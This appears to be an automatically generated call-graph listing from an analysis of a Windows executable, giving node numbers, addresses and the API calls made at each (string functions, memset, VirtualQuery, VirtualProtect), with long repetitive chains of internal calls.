2810->2814 2811->2815 2812->2797 2818 7ff6e17d145e 2 API calls 2812->2818 2817 7ff6e17d3350 11 API calls 2814->2817 3405 7ff6e17d3350 memset 2815->3405 2820 7ff6e17d5e48 2817->2820 2818->2797 2821 7ff6e17d14c7 2 API calls 2820->2821 2822 7ff6e17d5e76 memset 2821->2822 2825 7ff6e17d5e97 2822->2825 2823 7ff6e17d2df0 11 API calls 2833 7ff6e17d5945 2823->2833 2824 7ff6e17d58bc 2824->2823 2826 7ff6e17d5ee7 wcslen 2825->2826 2827 7ff6e17d5f37 wcscat memset 2826->2827 2828 7ff6e17d5ef9 2826->2828 2835 7ff6e17d5f71 2827->2835 2830 7ff6e17d5f10 _wcsnicmp 2828->2830 2830->2827 2832 7ff6e17d5f22 wcslen 2830->2832 2831 7ff6e17d2df0 11 API calls 2836 7ff6e17d4234 2831->2836 2832->2827 2832->2830 2833->2831 2834 7ff6e17d5fe1 wcscpy wcscat 2837 7ff6e17d6013 2834->2837 2835->2834 2836->2659 2838 7ff6e17d6d92 memcpy 2837->2838 2839 7ff6e17d6150 2837->2839 2838->2839 2840 7ff6e17d620f wcslen 2839->2840 2841 7ff6e17d153f 2 API calls 2840->2841 2842 7ff6e17d629a 2841->2842 2843 7ff6e17d145e 2 API calls 2842->2843 2844 7ff6e17d62ab 2843->2844 2845 7ff6e17d634a 2844->2845 2847 7ff6e17d2f70 2 API calls 2844->2847 2846 7ff6e17d145e 2 API calls 2845->2846 2846->2836 2848 7ff6e17d62d8 2847->2848 2849 7ff6e17d38e0 11 API calls 2848->2849 2850 7ff6e17d6304 2849->2850 2851 7ff6e17d14c7 2 API calls 2850->2851 2852 7ff6e17d633c 2851->2852 2852->2845 2853 7ff6e17d145e 2 API calls 2852->2853 2853->2845 2857 7ff6e17d1bc2 2854->2857 2855 7ff6e17d1c04 memcpy 2855->2671 2857->2855 2858 7ff6e17d1c45 VirtualQuery 2857->2858 2859 7ff6e17d1cf4 2857->2859 2858->2859 2863 7ff6e17d1c72 2858->2863 2860 7ff6e17d1d23 GetLastError 2859->2860 2862 7ff6e17d1d37 2860->2862 2861 7ff6e17d1ca4 VirtualProtect 2861->2855 2861->2860 2863->2855 2863->2861 3501 7ff6e17d1394 2864->3501 2866 7ff6e17d154e 2867 7ff6e17d1394 2 API calls 2866->2867 2868 7ff6e17d155d 2867->2868 2869 7ff6e17d1394 2 API calls 2868->2869 2870 7ff6e17d156c 2869->2870 2871 7ff6e17d1394 2 API calls 2870->2871 2872 7ff6e17d157b 2871->2872 2873 7ff6e17d1394 2 API calls 2872->2873 2874 7ff6e17d158a 2873->2874 2875 7ff6e17d1394 2 API calls 2874->2875 2876 7ff6e17d1599 2875->2876 2877 7ff6e17d1394 2 API calls 2876->2877 2878 7ff6e17d15a8 2877->2878 2879 7ff6e17d1394 2 API calls 2878->2879 2880 7ff6e17d15b7 2879->2880 2881 7ff6e17d15c6 2880->2881 2882 7ff6e17d1394 2 API calls 2880->2882 2883 7ff6e17d1394 2 API calls 2881->2883 2882->2881 2884 7ff6e17d15d0 2883->2884 2885 7ff6e17d15d5 2884->2885 2886 7ff6e17d1394 2 API calls 2884->2886 2887 7ff6e17d1394 2 API calls 2885->2887 2886->2885 2888 7ff6e17d15df 2887->2888 2889 7ff6e17d15e4 2888->2889 2890 7ff6e17d1394 2 API calls 2888->2890 2891 7ff6e17d1394 2 API calls 2889->2891 2890->2889 2892 7ff6e17d15f3 2891->2892 2892->2836 2893 7ff6e17d1503 2892->2893 2894 7ff6e17d1394 2 API calls 2893->2894 2895 7ff6e17d150d 2894->2895 2896 7ff6e17d1394 2 API calls 2895->2896 2897 7ff6e17d1512 2896->2897 2898 7ff6e17d1394 2 API calls 2897->2898 2899 7ff6e17d1521 2898->2899 2900 7ff6e17d1394 2 API calls 2899->2900 2901 7ff6e17d1530 2900->2901 2902 7ff6e17d1394 2 API calls 2901->2902 2903 7ff6e17d153f 2902->2903 2904 7ff6e17d1394 2 API calls 2903->2904 2905 7ff6e17d154e 2904->2905 2906 7ff6e17d1394 2 API calls 2905->2906 2907 7ff6e17d155d 2906->2907 2908 7ff6e17d1394 2 API calls 2907->2908 2909 7ff6e17d156c 2908->2909 2910 7ff6e17d1394 2 API calls 2909->2910 2911 7ff6e17d157b 2910->2911 2912 7ff6e17d1394 2 API calls 2911->2912 2913 7ff6e17d158a 2912->2913 2914 7ff6e17d1394 2 API calls 2913->2914 2915 7ff6e17d1599 2914->2915 2916 7ff6e17d1394 2 API calls 2915->2916 2917 7ff6e17d15a8 2916->2917 2918 7ff6e17d1394 2 API calls 2917->2918 2919 7ff6e17d15b7 2918->2919 2920 7ff6e17d15c6 2919->2920 2921 7ff6e17d1394 2 API calls 2919->2921 2922 7ff6e17d1394 2 API calls 2920->2922 2921->2920 2923 7ff6e17d15d0 2922->2923 2924 7ff6e17d15d5 2923->2924 2925 7ff6e17d1394 2 API calls 2923->2925 2926 7ff6e17d1394 2 API calls 2924->2926 2925->2924 2927 7ff6e17d15df 2926->2927 2928 7ff6e17d15e4 2927->2928 2929 7ff6e17d1394 2 API calls 2927->2929 2930 7ff6e17d1394 2 API calls 2928->2930 2929->2928 2931 7ff6e17d15f3 2930->2931 2931->2686 2932 7ff6e17d156c 2931->2932 2933 7ff6e17d1394 2 API calls 2932->2933 2934 7ff6e17d157b 2933->2934 2935 7ff6e17d1394 2 API calls 2934->2935 2936 7ff6e17d158a 2935->2936 2937 7ff6e17d1394 2 API calls 2936->2937 2938 7ff6e17d1599 2937->2938 2939 7ff6e17d1394 2 API calls 2938->2939 2940 7ff6e17d15a8 2939->2940 2941 7ff6e17d1394 2 API calls 2940->2941 2942 7ff6e17d15b7 2941->2942 2943 7ff6e17d15c6 2942->2943 2944 7ff6e17d1394 2 API calls 2942->2944 2945 7ff6e17d1394 2 API calls 2943->2945 2944->2943 2946 7ff6e17d15d0 2945->2946 2947 7ff6e17d15d5 2946->2947 2948 7ff6e17d1394 2 API calls 2946->2948 2949 7ff6e17d1394 2 API calls 2947->2949 2948->2947 2950 7ff6e17d15df 2949->2950 2951 7ff6e17d15e4 2950->2951 2952 7ff6e17d1394 2 API calls 2950->2952 2953 7ff6e17d1394 2 API calls 2951->2953 2952->2951 2954 7ff6e17d15f3 2953->2954 2954->2686 2955 7ff6e17d145e 2954->2955 2956 7ff6e17d1394 2 API calls 2955->2956 2957 7ff6e17d146d 2956->2957 2958 7ff6e17d1394 2 API calls 2957->2958 2959 7ff6e17d147c 2958->2959 2960 7ff6e17d1394 2 API calls 2959->2960 2961 7ff6e17d148b 2960->2961 2962 7ff6e17d1394 2 API calls 2961->2962 2963 7ff6e17d149a 2962->2963 2964 7ff6e17d1394 2 API calls 2963->2964 2965 7ff6e17d14a9 2964->2965 2966 7ff6e17d14b8 2965->2966 2967 7ff6e17d1394 2 API calls 2965->2967 2968 7ff6e17d1394 2 API calls 2966->2968 2967->2966 2969 7ff6e17d14c2 2968->2969 2970 7ff6e17d14c7 2969->2970 2971 7ff6e17d1394 2 API calls 2969->2971 2972 7ff6e17d1394 2 API calls 2970->2972 2971->2970 2973 7ff6e17d14d6 2972->2973 2974 7ff6e17d1394 2 API calls 2973->2974 2975 7ff6e17d14e0 2974->2975 2976 7ff6e17d14e5 2975->2976 2977 7ff6e17d1394 2 API calls 2975->2977 2978 7ff6e17d1394 2 API calls 2976->2978 2977->2976 2979 7ff6e17d14ef 2978->2979 2980 7ff6e17d14f4 2979->2980 2981 7ff6e17d1394 2 API calls 2979->2981 2982 7ff6e17d1394 2 API calls 2980->2982 2981->2980 2983 7ff6e17d14fe 2982->2983 2984 7ff6e17d1503 2983->2984 2985 7ff6e17d1394 2 API calls 2983->2985 2986 7ff6e17d1394 2 API calls 2984->2986 2985->2984 2987 7ff6e17d150d 2986->2987 2988 7ff6e17d1394 2 API calls 2987->2988 2989 7ff6e17d1512 2988->2989 2990 7ff6e17d1394 2 API calls 2989->2990 2991 7ff6e17d1521 2990->2991 2992 7ff6e17d1394 2 API calls 2991->2992 2993 7ff6e17d1530 2992->2993 2994 7ff6e17d1394 2 API calls 2993->2994 2995 7ff6e17d153f 2994->2995 2996 7ff6e17d1394 2 API calls 2995->2996 2997 7ff6e17d154e 2996->2997 2998 7ff6e17d1394 2 API calls 2997->2998 2999 7ff6e17d155d 2998->2999 3000 7ff6e17d1394 2 API calls 2999->3000 3001 7ff6e17d156c 3000->3001 3002 7ff6e17d1394 2 API calls 3001->3002 3003 7ff6e17d157b 3002->3003 3004 7ff6e17d1394 2 API calls 3003->3004 3005 7ff6e17d158a 3004->3005 3006 7ff6e17d1394 2 API calls 3005->3006 3007 7ff6e17d1599 3006->3007 3008 7ff6e17d1394 2 API calls 3007->3008 3009 7ff6e17d15a8 3008->3009 3010 7ff6e17d1394 2 API calls 3009->3010 3011 7ff6e17d15b7 3010->3011 3012 7ff6e17d15c6 3011->3012 3013 7ff6e17d1394 2 API calls 3011->3013 3014 7ff6e17d1394 2 API calls 3012->3014 3013->3012 3015 7ff6e17d15d0 3014->3015 3016 7ff6e17d15d5 3015->3016 3017 7ff6e17d1394 2 API calls 3015->3017 3018 7ff6e17d1394 2 API calls 3016->3018 3017->3016 3019 7ff6e17d15df 3018->3019 3020 7ff6e17d15e4 3019->3020 3021 7ff6e17d1394 2 API calls 3019->3021 3022 7ff6e17d1394 2 API calls 3020->3022 3021->3020 3023 7ff6e17d15f3 3022->3023 3023->2686 3505 7ff6e17d2660 3024->3505 3026 7ff6e17d2e00 memset 3035 7ff6e17d2e3c 3026->3035 3029 7ff6e17d145e 2 API calls 3030 7ff6e17d2f35 3029->3030 3031 7ff6e17d2f53 3030->3031 3540 7ff6e17d1512 3030->3540 3033 7ff6e17d145e 2 API calls 3031->3033 3034 7ff6e17d2f5d 3033->3034 3034->2836 3507 7ff6e17d2690 3035->3507 3037 7ff6e17d1394 2 API calls 3036->3037 3038 7ff6e17d147c 3037->3038 3039 7ff6e17d1394 2 API calls 3038->3039 3040 7ff6e17d148b 3039->3040 3041 7ff6e17d1394 2 API calls 3040->3041 3042 7ff6e17d149a 3041->3042 3043 7ff6e17d1394 2 API calls 3042->3043 3044 7ff6e17d14a9 3043->3044 3045 7ff6e17d14b8 3044->3045 3046 7ff6e17d1394 2 API calls 3044->3046 3047 7ff6e17d1394 2 API calls 3045->3047 3046->3045 3048 7ff6e17d14c2 3047->3048 3049 7ff6e17d14c7 3048->3049 3050 7ff6e17d1394 2 API calls 3048->3050 3051 7ff6e17d1394 2 API calls 3049->3051 3050->3049 3052 7ff6e17d14d6 3051->3052 3053 7ff6e17d1394 2 API calls 3052->3053 3054 7ff6e17d14e0 3053->3054 3055 7ff6e17d14e5 3054->3055 3056 7ff6e17d1394 2 API calls 3054->3056 3057 7ff6e17d1394 2 API calls 3055->3057 3056->3055 3058 7ff6e17d14ef 3057->3058 3059 7ff6e17d14f4 3058->3059 3060 7ff6e17d1394 2 API calls 3058->3060 3061 7ff6e17d1394 2 API calls 3059->3061 3060->3059 3062 7ff6e17d14fe 3061->3062 3063 7ff6e17d1503 3062->3063 3064 7ff6e17d1394 2 API calls 3062->3064 3065 7ff6e17d1394 2 API calls 3063->3065 3064->3063 3066 7ff6e17d150d 3065->3066 3067 7ff6e17d1394 2 API calls 3066->3067 3068 7ff6e17d1512 3067->3068 3069 7ff6e17d1394 2 API calls 3068->3069 3070 7ff6e17d1521 3069->3070 3071 7ff6e17d1394 2 API calls 3070->3071 3072 7ff6e17d1530 3071->3072 3073 7ff6e17d1394 2 API calls 3072->3073 3074 7ff6e17d153f 3073->3074 3075 7ff6e17d1394 2 API calls 3074->3075 3076 7ff6e17d154e 3075->3076 3077 7ff6e17d1394 2 API calls 3076->3077 3078 7ff6e17d155d 3077->3078 3079 7ff6e17d1394 2 API calls 3078->3079 3080 7ff6e17d156c 3079->3080 3081 7ff6e17d1394 2 API calls 3080->3081 3082 7ff6e17d157b 3081->3082 3083 7ff6e17d1394 2 API calls 3082->3083 3084 7ff6e17d158a 3083->3084 3085 7ff6e17d1394 2 API calls 3084->3085 3086 7ff6e17d1599 3085->3086 3087 7ff6e17d1394 2 API calls 3086->3087 3088 7ff6e17d15a8 3087->3088 3089 7ff6e17d1394 2 API calls 3088->3089 3090 7ff6e17d15b7 3089->3090 3091 7ff6e17d15c6 3090->3091 3092 7ff6e17d1394 2 API calls 3090->3092 3093 7ff6e17d1394 2 API calls 3091->3093 3092->3091 3094 7ff6e17d15d0 3093->3094 3095 7ff6e17d15d5 3094->3095 3096 7ff6e17d1394 2 API calls 3094->3096 3097 7ff6e17d1394 2 API calls 3095->3097 3096->3095 3098 7ff6e17d15df 3097->3098 3099 7ff6e17d15e4 3098->3099 3100 7ff6e17d1394 2 API calls 3098->3100 3101 7ff6e17d1394 2 API calls 3099->3101 3100->3099 3102 7ff6e17d15f3 3101->3102 3102->2728 3103 7ff6e17d1404 3102->3103 3104 7ff6e17d1394 2 API calls 3103->3104 3105 7ff6e17d1413 3104->3105 3106 7ff6e17d1394 2 API calls 3105->3106 3107 7ff6e17d1422 3106->3107 3108 7ff6e17d1394 2 API calls 3107->3108 3109 7ff6e17d1431 3108->3109 3110 7ff6e17d1394 2 API calls 3109->3110 3111 7ff6e17d1440 3110->3111 3112 7ff6e17d1394 2 API calls 3111->3112 3113 7ff6e17d144f 3112->3113 3114 7ff6e17d1394 2 API calls 3113->3114 3115 7ff6e17d145e 3114->3115 3116 7ff6e17d1394 2 API calls 3115->3116 3117 7ff6e17d146d 3116->3117 3118 7ff6e17d1394 2 API calls 3117->3118 3119 7ff6e17d147c 3118->3119 3120 7ff6e17d1394 2 API calls 3119->3120 3121 7ff6e17d148b 3120->3121 3122 7ff6e17d1394 2 API calls 3121->3122 3123 7ff6e17d149a 3122->3123 3124 7ff6e17d1394 2 API calls 3123->3124 3125 7ff6e17d14a9 3124->3125 3126 7ff6e17d14b8 3125->3126 3127 7ff6e17d1394 2 API calls 3125->3127 3128 7ff6e17d1394 2 API calls 3126->3128 3127->3126 3129 7ff6e17d14c2 3128->3129 3130 7ff6e17d14c7 3129->3130 3131 7ff6e17d1394 2 API calls 3129->3131 3132 7ff6e17d1394 2 API calls 3130->3132 3131->3130 3133 7ff6e17d14d6 3132->3133 3134 7ff6e17d1394 2 API calls 3133->3134 3135 7ff6e17d14e0 3134->3135 3136 7ff6e17d14e5 3135->3136 3137 7ff6e17d1394 2 API calls 3135->3137 3138 7ff6e17d1394 2 API calls 3136->3138 3137->3136 3139 7ff6e17d14ef 3138->3139 3140 7ff6e17d14f4 3139->3140 3141 7ff6e17d1394 2 API calls 3139->3141 3142 7ff6e17d1394 2 API calls 3140->3142 3141->3140 3143 7ff6e17d14fe 3142->3143 3144 7ff6e17d1503 3143->3144 3145 7ff6e17d1394 2 API calls 3143->3145 3146 7ff6e17d1394 2 API calls 3144->3146 3145->3144 3147 7ff6e17d150d 3146->3147 3148 7ff6e17d1394 2 API calls 3147->3148 3149 7ff6e17d1512 3148->3149 3150 7ff6e17d1394 2 API calls 3149->3150 3151 7ff6e17d1521 3150->3151 3152 7ff6e17d1394 2 API calls 3151->3152 3153 7ff6e17d1530 3152->3153 3154 7ff6e17d1394 2 API calls 3153->3154 3155 7ff6e17d153f 3154->3155 3156 7ff6e17d1394 2 API calls 3155->3156 3157 7ff6e17d154e 3156->3157 3158 7ff6e17d1394 2 API calls 3157->3158 3159 7ff6e17d155d 3158->3159 3160 7ff6e17d1394 2 API calls 3159->3160 3161 7ff6e17d156c 3160->3161 3162 7ff6e17d1394 2 API calls 3161->3162 3163 7ff6e17d157b 3162->3163 3164 7ff6e17d1394 2 API calls 3163->3164 3165 7ff6e17d158a 3164->3165 3166 7ff6e17d1394 2 API calls 3165->3166 3167 7ff6e17d1599 3166->3167 3168 7ff6e17d1394 2 API calls 3167->3168 3169 7ff6e17d15a8 3168->3169 3170 7ff6e17d1394 2 API calls 3169->3170 3171 7ff6e17d15b7 3170->3171 3172 7ff6e17d15c6 3171->3172 3173 7ff6e17d1394 2 API calls 3171->3173 3174 7ff6e17d1394 2 API calls 3172->3174 3173->3172 3175 7ff6e17d15d0 3174->3175 3176 7ff6e17d15d5 3175->3176 3177 7ff6e17d1394 2 API calls 3175->3177 3178 7ff6e17d1394 2 API calls 3176->3178 3177->3176 3179 7ff6e17d15df 3178->3179 3180 7ff6e17d15e4 3179->3180 3181 7ff6e17d1394 2 API calls 3179->3181 3182 7ff6e17d1394 2 API calls 3180->3182 3181->3180 3183 7ff6e17d15f3 3182->3183 3183->2732 3185 7ff6e17d1394 2 API calls 3184->3185 3186 7ff6e17d158a 3185->3186 3187 7ff6e17d1394 2 API calls 3186->3187 3188 7ff6e17d1599 3187->3188 3189 7ff6e17d1394 2 API calls 3188->3189 3190 7ff6e17d15a8 3189->3190 3191 7ff6e17d1394 2 API calls 3190->3191 3192 7ff6e17d15b7 3191->3192 3193 7ff6e17d15c6 3192->3193 3194 7ff6e17d1394 2 API calls 3192->3194 3195 7ff6e17d1394 2 API calls 3193->3195 3194->3193 3196 7ff6e17d15d0 3195->3196 3197 7ff6e17d15d5 3196->3197 3198 7ff6e17d1394 2 API calls 3196->3198 3199 7ff6e17d1394 2 API calls 3197->3199 3198->3197 3200 7ff6e17d15df 3199->3200 3201 7ff6e17d15e4 3200->3201 3202 7ff6e17d1394 2 API calls 3200->3202 3203 7ff6e17d1394 2 API calls 3201->3203 3202->3201 3204 7ff6e17d15f3 3203->3204 3204->2741 3205 7ff6e17d158a 3204->3205 3206 7ff6e17d1394 2 API calls 3205->3206 3207 7ff6e17d1599 3206->3207 3208 7ff6e17d1394 2 API calls 3207->3208 3209 7ff6e17d15a8 3208->3209 3210 7ff6e17d1394 2 API calls 3209->3210 3211 7ff6e17d15b7 3210->3211 3212 7ff6e17d15c6 3211->3212 3213 7ff6e17d1394 2 API calls 3211->3213 3214 7ff6e17d1394 2 API calls 3212->3214 3213->3212 3215 7ff6e17d15d0 3214->3215 3216 7ff6e17d15d5 3215->3216 3217 7ff6e17d1394 2 API calls 3215->3217 3218 7ff6e17d1394 2 API calls 3216->3218 3217->3216 3219 7ff6e17d15df 3218->3219 3220 7ff6e17d15e4 3219->3220 3221 7ff6e17d1394 2 API calls 3219->3221 3222 7ff6e17d1394 2 API calls 3220->3222 3221->3220 3223 7ff6e17d15f3 3222->3223 3223->2741 3225 7ff6e17d1394 2 API calls 3224->3225 3226 7ff6e17d15f3 3225->3226 3226->2744 3228 7ff6e17d1394 2 API calls 3227->3228 3229 7ff6e17d15b7 3228->3229 3230 7ff6e17d15c6 3229->3230 3231 7ff6e17d1394 2 API calls 3229->3231 3232 7ff6e17d1394 2 API calls 3230->3232 3231->3230 3233 7ff6e17d15d0 3232->3233 3234 7ff6e17d15d5 3233->3234 3235 7ff6e17d1394 2 API calls 3233->3235 3236 7ff6e17d1394 2 API calls 3234->3236 3235->3234 3237 7ff6e17d15df 3236->3237 3238 7ff6e17d15e4 3237->3238 3239 7ff6e17d1394 2 API calls 3237->3239 3240 7ff6e17d1394 2 API calls 3238->3240 3239->3238 3241 7ff6e17d15f3 3240->3241 3241->2763 3241->2764 3243 7ff6e17d1394 2 API calls 3242->3243 3244 7ff6e17d153f 3243->3244 3245 7ff6e17d1394 2 API calls 3244->3245 3246 7ff6e17d154e 3245->3246 3247 7ff6e17d1394 2 API calls 3246->3247 3248 7ff6e17d155d 3247->3248 3249 7ff6e17d1394 2 API calls 3248->3249 3250 7ff6e17d156c 3249->3250 3251 7ff6e17d1394 2 API calls 3250->3251 3252 7ff6e17d157b 3251->3252 3253 7ff6e17d1394 2 API calls 3252->3253 3254 7ff6e17d158a 3253->3254 3255 7ff6e17d1394 2 API calls 3254->3255 3256 7ff6e17d1599 3255->3256 3257 7ff6e17d1394 2 API calls 3256->3257 3258 7ff6e17d15a8 3257->3258 3259 7ff6e17d1394 2 API calls 3258->3259 3260 7ff6e17d15b7 3259->3260 3261 7ff6e17d15c6 3260->3261 3262 7ff6e17d1394 2 API calls 3260->3262 3263 7ff6e17d1394 2 API calls 3261->3263 3262->3261 3264 7ff6e17d15d0 3263->3264 3265 7ff6e17d15d5 3264->3265 3266 7ff6e17d1394 2 API calls 3264->3266 3267 7ff6e17d1394 2 API calls 3265->3267 3266->3265 3268 7ff6e17d15df 3267->3268 3269 7ff6e17d15e4 3268->3269 3270 7ff6e17d1394 2 API calls 3268->3270 3271 7ff6e17d1394 2 API calls 3269->3271 3270->3269 3272 7ff6e17d15f3 3271->3272 3272->2787 3272->2788 3274 7ff6e17d14b8 3273->3274 3275 7ff6e17d1394 2 API calls 3273->3275 3276 7ff6e17d1394 2 API calls 3274->3276 3275->3274 3277 7ff6e17d14c2 3276->3277 3278 7ff6e17d14c7 3277->3278 3279 7ff6e17d1394 2 API calls 3277->3279 3280 7ff6e17d1394 2 API calls 3278->3280 3279->3278 3281 7ff6e17d14d6 3280->3281 3282 7ff6e17d1394 2 API calls 3281->3282 3283 7ff6e17d14e0 3282->3283 3284 7ff6e17d14e5 3283->3284 3285 7ff6e17d1394 2 API calls 3283->3285 3286 7ff6e17d1394 2 API calls 3284->3286 3285->3284 3287 7ff6e17d14ef 3286->3287 3288 7ff6e17d14f4 3287->3288 3289 7ff6e17d1394 2 API calls 3287->3289 3290 7ff6e17d1394 2 API calls 3288->3290 3289->3288 3291 7ff6e17d14fe 3290->3291 3292 7ff6e17d1503 3291->3292 3293 7ff6e17d1394 2 API calls 3291->3293 3294 7ff6e17d1394 2 API calls 3292->3294 3293->3292 3295 7ff6e17d150d 3294->3295 3296 7ff6e17d1394 2 API calls 3295->3296 3297 7ff6e17d1512 3296->3297 3298 7ff6e17d1394 2 API calls 3297->3298 3299 7ff6e17d1521 3298->3299 3300 7ff6e17d1394 2 API calls 3299->3300 3301 7ff6e17d1530 3300->3301 3302 7ff6e17d1394 2 API calls 3301->3302 3303 7ff6e17d153f 3302->3303 3304 7ff6e17d1394 2 API calls 3303->3304 3305 7ff6e17d154e 3304->3305 3306 7ff6e17d1394 2 API calls 3305->3306 3307 7ff6e17d155d 3306->3307 3308 7ff6e17d1394 2 API calls 3307->3308 3309 7ff6e17d156c 3308->3309 3310 7ff6e17d1394 2 API calls 3309->3310 3311 7ff6e17d157b 3310->3311 3312 7ff6e17d1394 2 API calls 3311->3312 3313 7ff6e17d158a 3312->3313 3314 7ff6e17d1394 2 API calls 3313->3314 3315 7ff6e17d1599 3314->3315 3316 7ff6e17d1394 2 API calls 3315->3316 3317 7ff6e17d15a8 3316->3317 3318 7ff6e17d1394 2 API calls 3317->3318 3319 7ff6e17d15b7 3318->3319 3320 7ff6e17d15c6 3319->3320 3321 7ff6e17d1394 2 API calls 3319->3321 3322 7ff6e17d1394 2 API calls 3320->3322 3321->3320 3323 7ff6e17d15d0 3322->3323 3324 7ff6e17d15d5 3323->3324 3325 7ff6e17d1394 2 API calls 3323->3325 3326 7ff6e17d1394 2 API calls 3324->3326 3325->3324 3327 7ff6e17d15df 3326->3327 3328 7ff6e17d15e4 3327->3328 3329 7ff6e17d1394 2 API calls 3327->3329 3330 7ff6e17d1394 2 API calls 3328->3330 3329->3328 3331 7ff6e17d15f3 3330->3331 3331->2795 3332 7ff6e17d1440 3331->3332 3333 7ff6e17d1394 2 API calls 3332->3333 3334 7ff6e17d144f 3333->3334 3335 7ff6e17d1394 2 API calls 3334->3335 3336 7ff6e17d145e 3335->3336 3337 7ff6e17d1394 2 API calls 3336->3337 3338 7ff6e17d146d 3337->3338 3339 7ff6e17d1394 2 API calls 3338->3339 3340 7ff6e17d147c 3339->3340 3341 7ff6e17d1394 2 API calls 3340->3341 3342 7ff6e17d148b 3341->3342 3343 7ff6e17d1394 2 API calls 3342->3343 3344 7ff6e17d149a 3343->3344 3345 7ff6e17d1394 2 API calls 3344->3345 3346 7ff6e17d14a9 3345->3346 3347 7ff6e17d14b8 3346->3347 3348 7ff6e17d1394 2 API calls 3346->3348 3349 7ff6e17d1394 2 API calls 3347->3349 3348->3347 3350 7ff6e17d14c2 3349->3350 3351 7ff6e17d14c7 3350->3351 3352 7ff6e17d1394 2 API calls 3350->3352 3353 7ff6e17d1394 2 API calls 3351->3353 3352->3351 3354 7ff6e17d14d6 3353->3354 3355 7ff6e17d1394 2 API calls 3354->3355 3356 7ff6e17d14e0 3355->3356 3357 7ff6e17d14e5 3356->3357 3358 7ff6e17d1394 2 API calls 3356->3358 3359 7ff6e17d1394 2 API calls 3357->3359 3358->3357 3360 7ff6e17d14ef 3359->3360 3361 7ff6e17d14f4 3360->3361 3362 7ff6e17d1394 2 API calls 3360->3362 3363 7ff6e17d1394 2 API calls 3361->3363 3362->3361 3364 7ff6e17d14fe 3363->3364 3365 7ff6e17d1503 3364->3365 3366 7ff6e17d1394 2 API calls 3364->3366 3367 7ff6e17d1394 2 API calls 3365->3367 3366->3365 3368 7ff6e17d150d 3367->3368 3369 7ff6e17d1394 2 API calls 3368->3369 3370 7ff6e17d1512 3369->3370 3371 7ff6e17d1394 2 API calls 3370->3371 3372 7ff6e17d1521 3371->3372 3373 7ff6e17d1394 2 API calls 3372->3373 3374 7ff6e17d1530 3373->3374 3375 7ff6e17d1394 2 API calls 3374->3375 3376 7ff6e17d153f 3375->3376 3377 7ff6e17d1394 2 API calls 3376->3377 3378 7ff6e17d154e 3377->3378 3379 7ff6e17d1394 2 API calls 3378->3379 3380 7ff6e17d155d 3379->3380 3381 7ff6e17d1394 2 API calls 3380->3381 3382 7ff6e17d156c 3381->3382 3383 7ff6e17d1394 2 API calls 3382->3383 3384 7ff6e17d157b 3383->3384 3385 7ff6e17d1394 2 API calls 3384->3385 3386 7ff6e17d158a 3385->3386 3387 7ff6e17d1394 2 API calls 3386->3387 3388 7ff6e17d1599 3387->3388 3389 7ff6e17d1394 2 API calls 3388->3389 3390 7ff6e17d15a8 3389->3390 3391 7ff6e17d1394 2 API calls 3390->3391 3392 7ff6e17d15b7 3391->3392 3393 7ff6e17d15c6 3392->3393 3394 7ff6e17d1394 2 API calls 3392->3394 3395 7ff6e17d1394 2 API calls 3393->3395 3394->3393 3396 7ff6e17d15d0 3395->3396 3397 7ff6e17d15d5 3396->3397 3398 7ff6e17d1394 2 API calls 3396->3398 3399 7ff6e17d1394 2 API calls 3397->3399 3398->3397 3400 7ff6e17d15df 3399->3400 3401 7ff6e17d15e4 3400->3401 3402 7ff6e17d1394 2 API calls 3400->3402 3403 7ff6e17d1394 2 API calls 3401->3403 3402->3401 3404 7ff6e17d15f3 3403->3404 3404->2795 3404->2808 3406 7ff6e17d35c1 memset 3405->3406 3410 7ff6e17d33c3 3405->3410 3408 7ff6e17d35e6 3406->3408 3407 7ff6e17d343a memset 3407->3410 3409 7ff6e17d362b wcscpy wcscat wcslen 3408->3409 3411 7ff6e17d1422 2 API calls 3409->3411 3410->3406 3410->3407 3412 7ff6e17d3493 wcscpy wcscat wcslen 3410->3412 3418 7ff6e17d145e 2 API calls 3410->3418 3420 7ff6e17d3579 3410->3420 3413 7ff6e17d3728 3411->3413 3690 7ff6e17d1422 3412->3690 3415 7ff6e17d3767 3413->3415 3767 7ff6e17d1431 3413->3767 3421 7ff6e17d14c7 3415->3421 3418->3410 3419 7ff6e17d145e 2 API calls 3419->3415 3420->3406 3422 7ff6e17d1394 2 API calls 3421->3422 3423 7ff6e17d14d6 3422->3423 3424 7ff6e17d1394 2 API calls 3423->3424 3425 7ff6e17d14e0 3424->3425 3426 7ff6e17d14e5 3425->3426 3427 7ff6e17d1394 2 API calls 3425->3427 3428 7ff6e17d1394 2 API calls 3426->3428 3427->3426 3429 7ff6e17d14ef 3428->3429 3430 7ff6e17d14f4 3429->3430 3431 7ff6e17d1394 2 API calls 3429->3431 3432 7ff6e17d1394 2 API calls 3430->3432 3431->3430 3433 7ff6e17d14fe 3432->3433 3434 7ff6e17d1503 3433->3434 3435 7ff6e17d1394 2 API calls 3433->3435 3436 7ff6e17d1394 2 API calls 3434->3436 3435->3434 3437 7ff6e17d150d 3436->3437 3438 7ff6e17d1394 2 API calls 3437->3438 3439 7ff6e17d1512 3438->3439 3440 7ff6e17d1394 2 API calls 3439->3440 3441 7ff6e17d1521 3440->3441 3442 7ff6e17d1394 2 API calls 3441->3442 3443 7ff6e17d1530 3442->3443 3444 7ff6e17d1394 2 API calls 3443->3444 3445 7ff6e17d153f 3444->3445 3446 7ff6e17d1394 2 API calls 3445->3446 3447 7ff6e17d154e 3446->3447 3448 7ff6e17d1394 2 API calls 3447->3448 3449 7ff6e17d155d 3448->3449 3450 7ff6e17d1394 2 API calls 3449->3450 3451 7ff6e17d156c 3450->3451 3452 7ff6e17d1394 2 API calls 3451->3452 3453 7ff6e17d157b 3452->3453 3454 7ff6e17d1394 2 API calls 3453->3454 3455 7ff6e17d158a 3454->3455 3456 7ff6e17d1394 2 API calls 3455->3456 3457 7ff6e17d1599 3456->3457 3458 7ff6e17d1394 2 API calls 3457->3458 3459 7ff6e17d15a8 3458->3459 3460 7ff6e17d1394 2 API calls 3459->3460 3461 7ff6e17d15b7 3460->3461 3462 7ff6e17d15c6 3461->3462 3463 7ff6e17d1394 2 API calls 3461->3463 3464 7ff6e17d1394 2 API calls 3462->3464 3463->3462 3465 7ff6e17d15d0 3464->3465 3466 7ff6e17d15d5 3465->3466 3467 7ff6e17d1394 2 API calls 3465->3467 3468 7ff6e17d1394 2 API calls 3466->3468 3467->3466 3469 7ff6e17d15df 3468->3469 3470 7ff6e17d15e4 3469->3470 3471 7ff6e17d1394 2 API calls 3469->3471 3472 7ff6e17d1394 2 API calls 3470->3472 3471->3470 3473 7ff6e17d15f3 3472->3473 3473->2824 3475 7ff6e17d2f88 3474->3475 3476 7ff6e17d14a9 2 API calls 3475->3476 3477 7ff6e17d2fd0 3476->3477 